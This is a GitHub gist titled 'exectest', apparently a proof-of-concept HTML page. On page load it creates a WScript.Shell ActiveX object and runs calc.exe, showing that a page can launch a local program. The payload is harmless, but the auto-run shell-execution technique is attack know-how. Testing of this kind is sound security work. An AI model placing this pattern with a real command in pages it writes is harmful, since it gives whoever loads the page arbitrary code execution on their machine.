Last active
May 15, 2020 13:55
-
-
Save xsuperbug/700fe2adc9f9476958670108e5d834e8 to your computer and use it in GitHub Desktop.
exectest
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script language="javascript" type="text/javascript"> | |
function OpenFile(){ | |
alert ('Work'); | |
var x = new ActiveXObject("WScript.Shell"); | |
x.run('calc.exe'); | |
} | |
</script> | |
</head> | |
<body onload="OpenFile()"> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment